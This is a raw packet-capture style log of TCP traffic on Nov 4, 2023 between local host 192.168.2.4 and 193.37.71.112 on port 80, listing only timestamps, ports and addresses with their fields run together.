                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.250186920 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.275939941 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.276191950 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.276928902 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.277314901 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.277395010 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.277395010 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.278126001 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.278182983 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.279227018 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.279284954 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.280653000 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.280716896 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.313515902 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.313539982 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.313571930 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.313601971 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.447532892 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.447577953 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.447608948 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.447794914 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.448230982 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.448282003 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.448478937 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.448532104 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.448556900 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.448600054 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.449435949 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.449486017 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.449523926 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.449568987 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.449846029 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.449897051 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.449934006 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.449978113 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.450046062 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.450090885 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.450778008 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.450824022 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.450853109 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.450896978 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.452620983 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.452677011 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.452783108 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.452824116 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.452985048 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.453036070 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.453850985 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.453891993 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.453905106 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.453944921 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.454083920 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.454135895 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.456629038 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.456702948 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.456739902 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.456784964 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.456866026 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.456916094 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.459052086 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.459085941 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.459115982 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.459131956 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.459176064 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.459217072 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.462034941 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.462066889 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.462084055 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.462106943 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.462294102 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.462338924 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.462470055 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.462512970 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.464612007 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.464672089 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.464884043 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.464916945 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.464927912 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.464947939 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.464956999 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.464988947 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.465245962 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.465286016 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.465620995 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.465662003 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.465801954 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.465847015 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.465850115 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.465889931 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.466718912 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.466751099 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.466763973 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.466797113 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.466979980 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.467022896 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.467346907 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.467391014 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.468571901 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.468619108 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.468642950 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.468688965 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.470244884 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.470298052 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.473452091 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.473510981 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.496167898 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.496345997 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.496357918 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.496392965 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.496404886 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.496433020 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.496864080 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.496920109 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.497003078 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.497045040 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.497148991 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.497194052 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.497431040 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.497487068 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.497801065 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.498464108 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.498611927 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.498672962 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.498723030 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.498832941 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.498898983 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.500802040 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.500859976 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.538062096 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.538162947 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.668695927 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.668966055 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.669090033 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.669847012 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.669920921 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.670025110 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.670085907 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.671328068 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.671395063 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.672949076 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.673026085 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.674993992 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.675067902 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.675352097 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.675415039 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.676878929 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.676959991 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.679135084 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.679208994 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.679523945 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.679591894 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.682210922 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.682282925 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.682688951 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.682753086 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.684858084 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.684927940 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.685028076 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.685084105 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.685528994 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.685591936 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.686114073 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.686184883 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.686794043 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.686861038 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.687237024 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.687302113 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.688698053 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.688764095 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.694099903 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.694181919 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.716728926 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.717102051 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.717171907 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.717236042 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.717264891 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.717314005 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.719113111 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.719201088 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.720112085 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.720204115 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.720315933 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.720365047 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.720448971 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.720520973 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.721237898 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.721301079 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.723917007 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.723980904 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.724006891 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.724096060 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.724136114 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.724185944 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.724191904 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.724231958 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.724953890 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.725018978 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.725112915 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.725182056 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.725435972 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.725486994 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.725492954 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.725539923 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.727158070 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.727193117 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.727252960 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.727252960 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.727318048 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.727756977 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.727822065 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.727855921 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.727904081 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.728076935 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.728128910 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.728429079 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.728482962 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.728821039 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.728880882 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.728974104 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.729022026 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.729223013 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.729285002 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.729649067 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.729707956 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.730906963 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.730940104 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.730982065 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.758609056 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.758749962 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.889596939 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.889628887 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.889641047 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.889802933 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.890311956 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.890366077 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.890383005 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.890399933 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.891813993 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.891885042 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.893666029 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.893735886 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.895127058 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.895200968 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.895525932 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.895576000 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.897166967 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.897238016 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.899532080 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.899599075 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.899986029 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.900034904 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.902494907 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.902641058 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.903382063 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.903433084 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.905019999 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.905078888 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.905165911 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.905208111 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.905777931 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.905822992 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.906147003 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.906189919 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.906997919 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.907044888 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.907354116 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.907396078 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.909113884 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.909169912 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.914854050 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.914959908 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.937572002 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.937776089 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.937908888 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.937952995 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.939527988 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.939560890 CET8049731193.37.71.112192.168.2.4
